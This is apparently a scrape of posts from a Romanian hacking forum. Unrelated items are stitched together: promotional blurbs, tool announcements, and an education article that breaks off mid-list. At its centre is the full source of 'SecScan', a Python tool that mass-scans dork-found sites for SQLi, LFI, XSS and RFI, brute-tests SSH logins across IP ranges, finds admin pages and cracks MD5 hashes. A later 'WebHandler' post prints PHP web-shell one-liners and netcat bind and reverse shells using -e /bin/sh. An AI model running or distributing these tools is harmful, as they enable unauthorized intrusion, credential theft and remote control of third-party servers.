Fi8sVrs

inseamna ca ai venit aici doar ca sa-ti faci reclama?!

exista sectiuni daca vrei sa ramai printre noi https://rstcenter.com/forum/web-design-stuff.rst https://rstcenter.com/forum/bloguri-si-bloggeri.rst

Our good friends at Google run a daily puzzle challenge and asked us to help get them out to the geeky masses. Each day’s puzzle will task your googling skills a little more, leading you to Google mastery. Each morning at 12:01 a.m. Eastern time you’ll see a new puzzle posted here. SPOILER WARNING: We leave the comments on so people can work together to find the answer. As such, if you want to figure it out all by yourself, DON’T READ THE COMMENTS! Also, with the knowledge that because others may publish their answers before you do, if you want to be able to search for information without accidentally seeing the answer somewhere, you can use the Google-a-Day site’s search tool, which will automatically filter out published answers, to give you a spoiler-free experience. And now, without further ado, we give you… TODAY’S PUZZLE: Start Playing Note: For our long-terms puzzlers, Google has changed their puzzle delivery, and now we can use this handy-dandy widget. We hope you enjoy! Source

Across the Northern Hemisphere, students and their teachers are heading back into the classroom for another year of reading, writing, and ‘rithmetic. While what we learn has broadly stayed the same for years, how we learn is changing rapidly as technology advances. The rise of online educational videos is giving learners access to the world’s greatest thinkers and teachers, leveling the playing field for all. We believe that inspiring online educators can come from all walks of life, and we want to find the next generation of educational YouTube stars - people with a talent for explaining tough concepts in compelling ways, and the passion and drive to assemble a global classroom of students. YouTube educational channels like Khan Academy, CrashCourse, Veritasium, Numberphile, MinutePhysics and Ted-Ed have grown to millions of views and subscribers - could you be next? Today we’re teaming up with Khan Academy to start a search for the Next EDU Gurus--10 super talented and engaging content creators who we’ll support with training, promotion, and a $1000 B&H gift card for production equipment, so they can take the next step in their YouTube - and education - careers. Do you set historical events to music? Doodle your geometry? Sing your Shakespeare? We’re looking for content creators who create all kinds of curriculum-related videos, from grammar to geography, history to histograms. You can submit any style of video as long as it’s educational and family-friendly--just bear in mind that we’re looking for content creators who can take people on a journey through a topic, so if you could imagine making ten, twenty, or fifty more videos on the topic in the future, all the better! The 10 YouTube Next EDU Gurus will be selected by a panel from the YouTube Education team and the Khan Academy. One of these 10 will also be awarded the Khan Academy EDU Guru Prize. The program is open to creators in the US, Canada, UK, Ireland, Australia, New Zealand; it opens today and closes on October 1. Our new EDU Gurus will help meet the growing demand for great educational content on YouTube. In the last year, you all spent 50% more time learning from YouTube Education’s 700,000 videos, and the number of subscribers to YouTube’s educational channels more than doubled. Check out the YouTube.com homepage today for the latest videos from some of our most engaging educational creators. You can also see a playlist of their latest and greatest below. If you’re an educator, visit youtube.com/teachers to view more than 300 playlists curated by teachers to align with common education topics. And if you’re looking for inspiration about incorporating YouTube in your school curriculum, see how one school from Kent, WA uses YouTube to experience the world beyond the walls of their classroom. via YouTube Blog: Finding the next generation of talented video educators with YouTube Next EDU Guru

daca mi-il imprumuti, imi iau singur iPhone de la ?igani edit: si-ti iau si tie unu

Gecko vad ca are https://rstcenter.com/forum/58898-6-free-pushed-text-effects.rst#post388519. O?????N?R?E?P?L?????Y?????=?A?????L?E?R?????T?

The LogAnalyzer project provides an easy to use but powerful front end for searching, reviewing and analyzing network event data, including syslog, windows event log and many other event sources. It focusses on the user-interface side of this project, so the data itself needs to be gathered by another program, for example the stock rsyslog, syslogd (often the distro's default syslogd), WinSyslog or MonitorWare Agent. LogAnalyzer works equally well on Linux and Windows. It is a free, GPLed open source application written mostly in php. Data can be obtained from databases but also from plain text files, for example those that are written by the syslogd. Demo Downloads Source

Description PAC is a Perl/GTK replacement for SecureCRT/Putty/etc (linux ssh/telnet/... gui)... It provides a GUI to configure connections: users, passwords, EXPECT regular expressions, macros, etc. You like 'SecureCRT/SSHMenu'? Check this tool and let me know - Released PAC 4.3: . Awesome PAC startup speed improvement, specially when *too many* connections are configured! . Added options to allow/deny both visible/audible terminal bell . Added DnD method for the "Local Shell" tab to untab . Added <Ctrl><Alt>d shortcut to duplicate current connection . Added <Shift><Ctrl><Alt>d shortcut to *FULL* duplicate current connection . Fixed a bugt that prevented PAC from working properly with "local executions on disconnection" . Fixed a bug that prevented PAC from correctly working if both "rdesktop" and "xfreerdp" packages were installed . Modified the "Save" connection method to not to allow saving if any error encountered . Fixed erroneous check for "cu" connections on save Unique Linux application to impletement almost every SecureCRT's functionality. Remote and local macros. Remotely send commands with EXPECT regexp. Cluster connections!! Connections on same cluster share keystrokes!! Proxy support. Serial/tty connection via cu/tip/remote-tty connections!! RDP (via rdesktop) and VNC (via vncviewer) support!! Pre/post connections local executions. Line-send dealy capabilities. TABS OR WINDOWS for connections!! Quick access to configured connections via tray menu icon. Wake-On-LAN features! Many many more I just forgot, and many many more to come (ASA I find time!) FREE (GNU GPLv3) Please, visits next pages for information/downloads: - Debian/Ubuntu based repository courtesy of Getdeb.net: Add "deb http://archive.getdeb.net/ubuntu lucid-getdeb apps" to your /etc/sources.list file, then "update" and finally install "pac". - Download: https://sourceforge.net/projects/pacmanager/ source: https://sites.google.com/site/davidtv/

ISME is a small framework to test IP phones from several editors. It can gather information from IP phone infrastructures, test their web servers for default login/password combinations, and also implement attacks against the systems. ISME has been written in perl with a perl/Tk interface to provide a portable and easy to use tool. Full documentation is also provided. Download source

This is a Security focused plug-in, which will send an email to the Administrator of the WordPress site each time login page is reached. If someone attempts to login, it will also send the user name they tried logging in with, as well as their IP address, User-Agent, Timestamp, and the Referral URL. If you see multiple attempts to login at times you are not logged on to the site, this means someone is attempting to brute force their way into your site, and you should ban the offending IP address from your site. Especially if they are trying multiple names, or sending them rapidly, one after another. Download Version 2012-08-13.5 Source: attack-scanner.com

This plugin drastically increases the security of the hash used to store passwords This plugin seamlessly changes your stored password hash to a far stronger one. The hash that it is changed to is generated with a variety of variations on PBKDF2, including my own ARC4PBKDF2 which adds custom ARC4 encryption during the hashing processs, then a SHA-1 to meet size constraints. This plugin exponentially increases the strength of your stored password. Download source: attack-scanner.com

WordPress Attack Scanner will log various types of attacks against your WordPress based site. In this free version, we only log the last 100 attacks, and then delete the oldest entry. In the fully paid for version, we have a built-in firewall, so anything that you see on the attack logs, would also be blocked. The full version also has unlimited logging, as well as the ability to export to a CSV file for use in spreadsheets, charts, or for plotting attacks on something such as Google Maps using the Google Maps API. In both the free and paid for version, we encrypt all logs. No CSV files exist on the site, and are generated on the fly, and never stored on the site, so no one can download and see your attack logs. However, you should change the default password as soon as you install and activate the plug-in! download source: packetstormsecurity.org

asa am dat am pus http in code pentru a nu se crea confuzie cu asterix-urile, probabil are filtre pe anumite clase de ip

demo http://www.facebook.com/pages/Indian-Name/340599102686666?sk=app_152630231540719 download http://www.filehost.ro/28858626/facebook_app_7z/ PHP Scripts - Facebook Campaign - Find Your Indian Name | CodeCanyon

C:\>ping http://***********.com/forum/index.php Ping request could not find host http://***********.com/forum/index.php. Please check the name and try again.

SecScan is the Multithreading Web Vulnerability Scanner plus professional Utilities for penetrating testers.A compact Web Apps Vulnerable Scanner for amateur pentester. Feature - SQLi, XSS, LFI, RFI Utilities - Admin/login finder, sub-domain finder, online/offline MD5 cracker, Router checker, local IP lookup Stable version will covers - auto SQL injector (bind with SlowQL) Fuzzer, Port/OS Scanner, MD5/SHA1 bruteforcer, MD5/SHA1 crypter, Known bugs - Still crash during MD5 dictionary attack on large lengths of text. XSS sometime gives false positive. How to run - To run: ./SecScan bug issues report at: norske.drittsekk@gmail.com || digiopen55@gmail.com Fix issues & upgrades: - Crash during LFI & XSS scans - More MD5 Dictionary cracking features & functions. - Run more stable in SQL scan mode. - Able to search more than 20 pages. (max is 90 to avoid cut off/CAPTCHA-request by search engine) - more search engine choice. Default is still Ask Engine. (Bing & Yahoo are fine, not recommend Google API) - More stealthy - Random user-agent generator Will add more in near-future: - SQL injector (bind with my other project slowQL) - MD5 bruteforcer (offline) - SHA1 Dic/Brute cracker - Hex viewer. - Proxy finder - Proxified mode - Heuristic port & OS scanner (similar to N-map) #!/usr/bin/env python import re import hashlib import Queue from random import choice import threading import time import urllib2 import sys import socket try: import paramiko #Router option requires the paramiko module for shh connections. PARAMIKO_IMPORTED = True except ImportError: PARAMIKO_IMPORTED = False USER_AGENT = ["Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3", "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7", "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)", "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)", "YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)", "Mozilla/5.0 (Windows; U; Windows NT 5.1) AppleWebKit/535.38.6 (KHTML, like Gecko) Version/5.1 Safari/535.38.6", "Mozilla/5.0 (Macintosh; U; U; PPC Mac OS X 10_6_7 rv:6.0; en-US) AppleWebKit/532.23.3 (KHTML, like Gecko) Version/4.0.2 Safari/532.23.3" ] option = ' ' vuln = 0 invuln = 0 np = 0 found = [] class Router(threading.Thread): """Checks for routers running ssh with given User/Pass""" def __init__(self, queue, user, passw): if not PARAMIKO_IMPORTED: print 'You need paramiko.' print 'http://www.lag.net/paramiko/' sys.exit(1) threading.Thread.__init__(self) self.queue = queue self.user = user self.passw = passw def run(self): """Tries to connect to given Ip on port 22""" ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) while True: try: ip_add = self.queue.get(False) except Queue.Empty: break try: ssh.connect(ip_add, username = self.user, password = self.passw, timeout = 10) ssh.close() print "Working: %s:22 - %s:%s\n" % (ip_add, self.user, self.passw) write = open('Routers.txt', "a+") write.write('%s:22 %s:%s\n' % (ip_add, self.user, self.passw)) write.close() self.queue.task_done() except: print 'Not Working: %s:22 - %s:%s\n' % (ip_add, self.user, self.passw) self.queue.task_done() class Ip: """Handles the Ip range creation""" def __init__(self): self.ip_range = [] self.start_ip = raw_input('Start ip: ') self.end_ip = raw_input('End ip: ') self.user = raw_input('User: ') self.passw = raw_input('Password: ') self.iprange() def iprange(self): """Creates list of Ip's from Start_Ip to End_Ip""" queue = Queue.Queue() start = list(map(int, self.start_ip.split("."))) end = list(map(int, self.end_ip.split("."))) tmp = start self.ip_range.append(self.start_ip) while tmp != end: start[3] += 1 for i in (3, 2, 1): if tmp[i] == 256: tmp[i] = 0 tmp[i-1] += 1 self.ip_range.append(".".join(map(str, tmp))) for add in self.ip_range: queue.put(add) for i in range(10): thread = Router(queue, self.user, self.passw ) thread.setDaemon(True) thread.start() queue.join() class Crawl: """Searches for dorks and grabs results""" def __init__(self): if option == '4': self.shell = str(raw_input('Shell location: ')) self.dork = raw_input('Enter your dork: ') self.queue = Queue.Queue() self.pages = raw_input('How many pages(Max 20): ') self.qdork = urllib2.quote(self.dork) self.page = 1 self.crawler() def crawler(self): """Crawls Ask.com for sites and sends them to appropriate scan""" print '\nScanning Ask...' for i in range(int(self.pages)): host = "http://uk.ask.com/web?q=%s&page=%s" % (str(self.qdork), self.page) req = urllib2.Request(host) req.add_header('User-Agent', choice(USER_AGENT)) response = urllib2.urlopen(req) source = response.read() start = 0 count = 1 end = len(source) numlinks = source.count('_t" href', start, end) while count < numlinks: start = source.find('_t" href', start, end) end = source.find(' onmousedown="return pk', start, end) link = source[start+10:end-1].replace("amp;","") self.queue.put(link) start = end end = len(source) count = count + 1 self.page += 1 if option == '1': for i in range(10): thread = ScanClass(self.queue) thread.setDaemon(True) thread.start() self.queue.join() elif option == '2': for i in range(10): thread = LScanClass(self.queue) thread.setDaemon(True) thread.start() self.queue.join() elif option == '3': for i in range(10): thread = XScanClass(self.queue) thread.setDaemon(True) thread.start() self.queue.join() elif option == '4': for i in range(10): thread = RScanClass(self.queue, self.shell) thread.setDaemon(True) thread.start() self.queue.join() class ScanClass(threading.Thread): """Scans for Sql errors and ouputs to file""" def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue self.schar = "'" self.file = 'sqli.txt' def run(self): """Scans Url for Sql errors""" while True: try: site = self.queue.get(False) except Queue.Empty: break if '=' in site: global vuln global invuln global np test = site + self.schar try: conn = urllib2.Request(test) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() data = opener.open(conn).read() except: self.queue.task_done() else: if (re.findall("You have an error in your SQL syntax", data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('mysql_fetch', data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('JET Database Engine', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('Microsoft OLE DB Provider for', data, re.I)): self.mssql(test) vuln += 1 else: print test + ' <-- Not Vuln' invuln += 1 else: print site + ' <-- No Parameters' np += 1 self.queue.task_done() def mysql(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file, "a+").read() if url in read: print 'Dupe: ' + url else: print "MySql: " + url write = open(self.file, "a+") write.write('[SQLI]: ' + url + "\n") write.close() def mssql(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file).read() if url in read: print 'Dupe: ' + url else: print "MsSql: " + url write = open ('[SQLI]: ' + self.file, "a+") write.write(url + "\n") write.close() class LScanClass(threading.Thread): """Scans for Lfi errors and outputs to file""" def __init__(self, queue): threading.Thread.__init__(self) self.file = 'lfi.txt' self.queue = queue self.lchar = '../' def run(self): """Checks Url for File Inclusion errors""" while True: try: site = self.queue.get(False) except Queue.Empty: break if '=' in site: lsite = site.rsplit('=', 1)[0] if lsite[-1] != "=": lsite = lsite + "=" test = lsite + self.lchar global vuln global invuln global np try: conn = urllib2.Request(test) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() data = opener.open(conn).read() except: self.queue.task_done() else: if (re.findall("failed to open stream: No such file or directory", data, re.I)): self.lfi(test) vuln += 1 else: print test + ' <-- Not Vuln' invuln += 1 else: print site + ' <-- No Parameters' np += 1 self.queue.task_done() def lfi(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file, "a+").read() if url in read: print 'Dupe: ' + url else: print "Lfi: " + url write = open(self.file, "a+") write.write('[LFI]: ' + url + "\n") write.close() class XScanClass(threading.Thread): """Scan for Xss errors and outputs to file""" def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue self.xchar = """"><script>alert('xss')</script>""" self.file = 'xss.txt' def run(self): """Checks Url for possible Xss""" while True: try: site = self.queue.get(False) except Queue.Empty: break if '=' in site: global vuln global invuln global np xsite = site.rsplit('=', 1)[0] if xsite[-1] != "=": xsite = xsite + "=" test = xsite + self.xchar try: conn = urllib2.Request(test) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() data = opener.open(conn).read() except: self.queue.task_done() else: if (re.findall("<script>alert('xss')</script>", data, re.I)): self.xss(test) vuln += 1 else: print test + ' <-- Not Vuln' invuln += 1 else: print site + ' <-- No Parameters' np += 1 self.queue.task_done() def xss(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file, "a+").read() if url in read: print 'Dupe: ' + url else: print "Xss: " + url write = open(self.file, "a+") write.write('[XSS]: ' + url + "\n") write.close() class RScanClass(threading.Thread): """Scans for Rfi errors and outputs to file""" def __init__(self, queue, shell): threading.Thread.__init__(self) self.queue = queue self.file = 'rfi.txt' self.shell = shell def run(self): """Checks Url for Remote File Inclusion vulnerability""" while True: try: site = self.queue.get(False) except Queue.Empty: break if '=' in site: global vuln global invuln global np rsite = site.rsplit('=', 1)[0] if rsite[-1] != "=": rsite = rsite + "=" link = rsite + self.shell + '?' try: conn = urllib2.Request(link) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() data = opener.open(conn).read() except: self.queue.task_done() else: if (re.findall('uname -a', data, re.I)): #Or change to whatever is going to be in your shell for sure. self.rfi(link) vuln += 1 else: print link + ' <-- Not Vuln' invuln += 1 else: print site + ' <-- No Parameters' np += 1 self.queue.task_done() def rfi(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file, "a+").read() if url in read: print 'Dupe: ' + url else: print "Rfi: " + url write = open(self.file, "a+") write.write('[Rfi]: ' + url + "\n") write.close() class Atest(threading.Thread): """Checks given site for Admin Pages/Dirs""" def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def run(self): """Checks if Admin Page/Dir exists""" while True: try: site = self.queue.get(False) except Queue.Empty: break try: conn = urllib2.Request(site) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() opener.open(conn) print site found.append(site) self.queue.task_done() except urllib2.URLError: self.queue.task_done() def admin(): """Create queue and threads for admin page scans""" print 'Need to include http:// and ending /\n' site = raw_input('Site: ') queue = Queue.Queue() dirs = ['admin.php', 'admin/', 'en/admin/', 'administrator/', 'moderator/', 'webadmin/', 'adminarea/', 'bb-admin/', 'adminLogin/', 'admin_area/', 'panel-administracion/', 'instadmin/', 'memberadmin/', 'administratorlogin/', 'adm/', 'admin/account.php', 'admin/index.php', 'admin/login.php', 'admin/admin.php', 'admin/account.php', 'joomla/administrator', 'login.php', 'admin_area/admin.php' ,'admin_area/login.php' ,'siteadmin/login.php' ,'siteadmin/index.php', 'siteadmin/login.html', 'admin/account.html', 'admin/index.html', 'admin/login.html', 'admin/admin.html', 'admin_area/index.php', 'bb-admin/index.php', 'bb-admin/login.php', 'bb-admin/admin.php', 'admin/home.php', 'admin_area/login.html', 'admin_area/index.html', 'admin/controlpanel.php', 'admincp/index.asp', 'admincp/login.asp', 'admincp/index.html', 'admin/account.html', 'adminpanel.html', 'webadmin.html', 'webadmin/index.html', 'webadmin/admin.html', 'webadmin/login.html', 'admin/admin_login.html', 'admin_login.html', 'panel-administracion/login.html', 'admin/cp.php', 'cp.php', 'administrator/index.php', 'cms', 'administrator/login.php', 'nsw/admin/login.php', 'webadmin/login.php', 'admin/admin_login.php', 'admin_login.php', 'administrator/account.php' ,'administrator.php', 'admin_area/admin.html', 'pages/admin/admin-login.php' ,'admin/admin-login.php', 'admin-login.php', 'bb-admin/index.html', 'bb-admin/login.html', 'bb-admin/admin.html', 'admin/home.html', 'modelsearch/login.php', 'moderator.php', 'moderator/login.php', 'moderator/admin.php', 'account.php', 'pages/admin/admin-login.html', 'admin/admin-login.html', 'admin-login.html', 'controlpanel.php', 'admincontrol.php', 'admin/adminLogin.html' ,'adminLogin.html', 'admin/adminLogin.html', 'home.html', 'rcjakar/admin/login.php', 'adminarea/index.html', 'adminarea/admin.html', 'webadmin.php', 'webadmin/index.php', 'webadmin/admin.php', 'admin/controlpanel.html', 'admin.html', 'admin/cp.html', 'cp.html', 'adminpanel.php', 'moderator.html', 'administrator/index.html', 'administrator/login.html', 'user.html', 'administrator/account.html', 'administrator.html', 'login.html', 'modelsearch/login.html', 'moderator/login.html', 'adminarea/login.html', 'panel-administracion/index.html', 'panel-administracion/admin.html', 'modelsearch/index.html', 'modelsearch/admin.html', 'admincontrol/login.html', 'adm/index.html', 'adm.html', 'moderator/admin.html', 'user.php', 'account.html', 'controlpanel.html', 'admincontrol.html', 'panel-administracion/login.php', 'wp-login.php', 'wp-admin', 'typo3', 'adminLogin.php', 'admin/adminLogin.php', 'home.php','adminarea/index.php' ,'adminarea/admin.php' ,'adminarea/login.php', 'panel-administracion/index.php', 'panel-administracion/admin.php', 'modelsearch/index.php', 'modelsearch/admin.php', 'admincontrol/login.php', 'adm/admloginuser.php', 'admloginuser.php', 'admin2.php', 'admin2/login.php', 'admin2/index.php', 'adm/index.php', 'adm.php', 'affiliate.php'] for add in dirs: test = site + add queue.put(test) for i in range(20): thread = Atest(queue) thread.setDaemon(True) thread.start() queue.join() def aprint(): """Print results of admin page scans""" print 'Search Finished\n' if len(found) == 0: print 'No pages found' else: for site in found: print 'Found: ' + site class SDtest(threading.Thread): """Checks given Domain for Sub Domains""" def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def run(self): """Checks if Sub Domain responds""" while True: try: domain = self.queue.get(False) except Queue.Empty: break try: site = 'http://' + domain conn = urllib2.Request(site) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() opener.open(conn) except urllib2.URLError: self.queue.task_done() else: target = socket.gethostbyname(domain) print 'Found: ' + site + ' - ' + target self.queue.task_done() def subd(): """Create queue and threads for sub domain scans""" queue = Queue.Queue() site = raw_input('Domain: ') sub = ["admin", "access", "accounting", "accounts", "admin", "administrator", "aix", "ap", "archivos", "aula", "aulas", "ayuda", "backup", "backups", "bart", "bd", "beta", "biblioteca", "billing", "blackboard", "blog", "blogs", "bsd", "cart", "catalog", "catalogo", "catalogue", "chat", "chimera", "citrix", "classroom", "clientes", "clients", "carro", "connect", "controller", "correoweb", "cpanel", "csg", "customers", "db", "dbs", "demo", "demon", "demostration", "descargas", "developers", "development", "diana", "directory", "dmz", "domain", "domaincontroller", "download", "downloads", "ds", "eaccess", "ejemplo", "ejemplos", "email", "enrutador", "example", "examples", "exchange", "eventos", "events", "extranet", "files", "finance", "firewall", "foro", "foros", "forum", "forums", "ftp", "ftpd", "fw", "galeria", "gallery", "gateway", "gilford", "groups", "groupwise", "guia", "guide", "gw", "help", "helpdesk", "hera", "heracles", "hercules", "home", "homer", "hotspot", "hypernova", "images", "imap", "imap3", "imap3d", "imapd", "imaps", "imgs", "imogen", "inmuebles", "internal", "intranet", "ipsec", "irc", "ircd", "jabber", "laboratorio", "lab", "laboratories", "labs", "library", "linux", "lisa", "login", "logs", "mail", "mailgate", "manager", "marketing", "members", "mercury", "meta", "meta01", "meta02", "meta03", "miembros", "minerva", "mob", "mobile", "moodle", "movil", "mssql", "mx", "mx0", "mx1", "mx2", "mx3", "mysql", "nelson", "neon", "netmail", "news", "novell", "ns", "ns0", "ns1", "ns2", "ns3", "online", "oracle", "owa", "partners", "pcanywhere", "pegasus", "pendrell", "personal", "photo", "photos", "pop", "pop3", "portal", "postman", "postmaster", "private", "proxy", "prueba", "pruebas", "public", "ras", "remote", "reports", "research", "restricted", "robinhood", "router", "rtr", "sales", "sample", "samples", "sandbox", "search", "secure", "seguro", "server", "services", "servicios", "servidor", "shop", "shopping", "smtp", "socios", "soporte", "squirrel", "squirrelmail", "ssh", "staff", "sms", "solaris", "sql", "stats", "sun", "support", "test", "tftp", "tienda", "unix", "upload", "uploads", "ventas", "virtual", "vista", "vnc", "vpn", "vpn1", "vpn2", "vpn3", "wap", "web1", "web2", "web3", "webct", "webadmin", "webmail", "webmaster", "win", "windows", "www", "ww0", "ww1", "ww2", "ww3", "www0", "www1", "www2", "www3", "xanthus", "zeus"] for check in sub: test = check + '.' + site queue.put(test) for i in range(20): thread = SDtest(queue) thread.setDaemon(True) thread.start() queue.join() class Cracker(threading.Thread): """Use a wordlist to try and brute the hash""" def __init__(self, queue, hashm): threading.Thread.__init__(self) self.queue = queue self.hashm = hashm def run(self): """Hash word and check against hash""" while True: try: word = self.queue.get(False) except Queue.Empty: break tmp = hashlib.md5(word).hexdigest() if tmp == self.hashm: self.result(word) self.queue.task_done() def result(self, words): """Print result if found""" print self.hashm + ' = ' + words def word(): """Create queue and threads for hash crack""" queue = Queue.Queue() wordlist = raw_input('Wordlist: ') hashm = raw_input('Enter Md5 hash: ') read = open(wordlist) for words in read: words = words.replace("\n","") queue.put(words) read.close() for i in range(5): thread = Cracker(queue, hashm) thread.setDaemon(True) thread.start() queue.join() class OnlineCrack: """Use online service to check for hash""" def crack(self): """Connect and check hash""" hashm = raw_input('Enter MD5 Hash: ') conn = urllib2.Request('http://md5.hashcracking.com/search.php?md5=%s' % (hashm)) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() opener.open(conn) data = opener.open(conn).read() if data == 'No results returned.': print '\n- Not found or not valid -' else: print '\n- %s -' % (data) class Check: """Check your current IP address""" def grab(self): """Connect to site and grab IP""" site = 'http://www.tracemyip.org/' try: conn = urllib2.Request(site) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() opener.open(conn) data = opener.open(conn).read() start = 0 end = len(data) start = data.find('onClick="', start, end) end = data.find('size=', start, end) ip_add = data[start+46:end-2].strip() print '\nYour current Ip address is %s' % (ip_add) except urllib2.HTTPError: print 'Error connecting' def output(): """Outputs dork scan results to screen""" print '\n>> ' + str(vuln) + ' Vulnerable Sites Found' print '>> ' + str(invuln) + ' Sites Not Vulnerable' print '>> ' + str(np) + ' Sites Without Parameters' if option == '1': print '>> Output Saved To sqli.txt\n' elif option == '2': print '>> Output Saved To lfi.txt' elif option == '3': print '>> Output Saved To xss.txt' elif option == '4': print '>> Output Saved To rfi.txt' def main(): """Outputs Menu and gets input""" red = "\033[01;31m{0}\033[00m" quotes = [ '\n{Happy Hacking, friends & foes} -- NorskeDrittsekk\n' '\n{What is the different between an exploiter & cryptographer? An exploiter has a lot creativity} -- f0ny\n' ] print red.format(''' ++++++++++++++++++++++++++++++++++ + = Advance Web Apps Scanner = + + + + by + + + + Black Tiger Security + + + + now available + + + + in public + ++++++++++++++++++++++++++++++++++ Please choose one of these options below (enter numbers only): === Scanners: [[READ: you don't have to enter inurl, just stuff like index.php?id= or .aspx?id=]] [1] SQLi [2] LFI [3] XSS [4] RFI === Other Tools: [5] Route Checker [6] Admin Page Finder [7] Sub Domain Scan [8] Dic MD5 cracker [9] Online/Rainbow MD5 cracker [10] Check local IP address ''') global option option = raw_input('Enter Option: ') if option: if option == '1': Crawl() output() print red.format(choice(quotes)) elif option == '2': Crawl() output() print red.format(choice(quotes)) elif option == '3': Crawl() output() print red.format(choice(quotes)) elif option == '4': Crawl() output() print red.format(choice(quotes)) elif option == '5': Ip() print red.format(choice(quotes)) elif option == '6': admin() aprint() print red.format(choice(quotes)) elif option == '7': subd() print red.format(choice(quotes)) elif option == '8': word() print red.format(choice(quotes)) elif option == '9': OnlineCrack().crack() print red.format(choice(quotes)) elif option == '10': Check().grab() print red.format(choice(quotes)) else: print '\nInvalid Choice\n' time.sleep(0.9) main() else: print '\nYou Must Enter An Option (Check if your typo is corrected.)\n' time.sleep(0.9) main() if __name__ == '__main__': main() download: http://secscan-py.googlecode.com/files/SecScan-v1.1b source

Info WebHandler tries to simulate a 'Linux bash prompt' to handle and process: - PHP program execution functions _(e.g. `system`, `passthru`, `exec`, etc)_ - Bind shell connections _(e.g. `nc <ip> <port>`)_ - Reserve shell connections _(e.g. `nc -lvvp 1234`)_ Another feature is to spoof the "User-Agent" field in the HTTP header. (--random-angent). It also supports HTTP proxies (--proxy http://<ip>:<port>) WebHandler works for POST and GET requests: <?php system($_GET['cmd']); ?> <?php passthru($_REQUEST['cmd']); ?> <?php echo exec($_POST['cmd']); ?> WebHandler is a replacement for netcat connections. A example bind connection (e.g. nc -lvvp 1234 -e /bin/sh) Normally the user would do: netcat -l -p 1234 nc -lvvp 1234 A example reverse connection (e.g. nc 127.0.0.1 4321 -e /bin/sh) Normally the user would do: netcat -l -p 4321 nc -lvvp 4321 Usage --Example file: echo '<?php system($_GET['cmd']); ?>' > /var/www/shell.php --url is a required argument when sending either GET or POST requests (e.g. a bind 'web based PHP' connection): python webhandler.py --url http://www.mywebsite.com/shell.php?cmd= python webhandler.py --url http://www.mywebsite.com/shell.php --method POST --parameter cmd python webhandler.py -u http://www.mywebsite.com/shell.php?cmd= --random-agent --turbo python webhandler.py -u http://www.mywebsite.com/shell.php?cmd= --proxy http://127.0.0.1:8080 --listen is a required argument when working waiting connection (e.g. a reverse 'raw' connection): python webhandler.py --listen 1234 Dependencies If your Python's version < 2.7.x, then argparse is required To install it run: sudo (apt-get|yum) install python-setuptools && sudo easy_install argparse OR sudo pip --install argparse. readline is optional. This module it used to provide elaborate line editing and history features git is optional. This allows for the project to be kept up-to-date Links Wiki Known Bugs Download Source

jsTree is a javascript based, cross browser tree component. It is packaged as a jQuery plugin. jsTree is absolutely free (licensed same as jQuery – under the terms of either the MIT License or the GNU General Public License (GPL) Version 2). Features at a glance: Various data sources - HTML, JSON, XML Drag & drop support Theme support + included themes Optional keyboard navigation Inline editing Define node types and fine tune them Optional checkbox tree support Supports plugins Supports AJAX loading Highly configurable Uses jQuery's event system Maintain the same tree in many languages Open/close optional animation Configurable multitree drag & drop Search function Optional state saving using cookies Currently supported browsers are: Internet Explorer 6+ * Mozilla Firefox 2+ Safari 3+ Opera 9+ Google Chrome download source

The university, which pioneered massive open online courses, unveils two new homegrown software platforms to host the courses. Fall quarter's free online courses cover a wide range of fields including computer science, mathematics, linguistics, science writing, sociology and education. Sixteen courses and two new platforms for interactive learning will highlight Stanford's free online offerings this fall, with more to follow during winter and spring quarters. From cryptography to science writing, technology entrepreneurship, finance and a crash course in creativity, the courses are open to anyone with a computer, anywhere. As the number of Stanford online courses has grown, so too has the range of fields, which now include computer science, mathematics, linguistics, science writing, sociology and education. Stanford is unique among universities in that it is offering its online courses on more than one platform. Each has its own distinct features and capabilities, among them video lectures, discussion forums, peer assessment, problem sets, quizzes and team projects. An open-source platform called Class2Go, developed by a team of Stanford engineers, will host An Introduction to Computer Networks, taught by Nick McKeown – an entrepreneur and a professor of electrical engineering and of computer science, whose networking startup, Nicira, was just acquired by VMware – and his colleague Philip Levis. Class2Go also will host a course on solar cells taught by physicist Bruce Clemens. Also notable is a team-based course, Technology Entrepreneurship, taught by Chuck Eesley, assistant professor of management science and engineering; the course garnered 37,000 students when it first appeared last spring. It is hosted on another new platform, Venture Lab, developed by Stanford faculty member Amin Saberi specifically for classes in which students work in teams. The most widely available online learning platform, Coursera, will host nine Stanford courses this quarter, among them a new course, Writing in the Sciences, taught by epidemiologist Kristin Sainani, as well as Scott Klemmer's Human-Computer Interaction, which last spring enrolled around 29,000 students. Coursera was developed by two Stanford computer scientists who currently are on leave. Students interested in registering should go to the course websites listed below or to the Stanford Online website, where updates will be available as new courses appear. Here is a list of fall quarter classes, with instructor, course title, start date and platform: Andrew Ng, Machine Learning, Aug. 20, 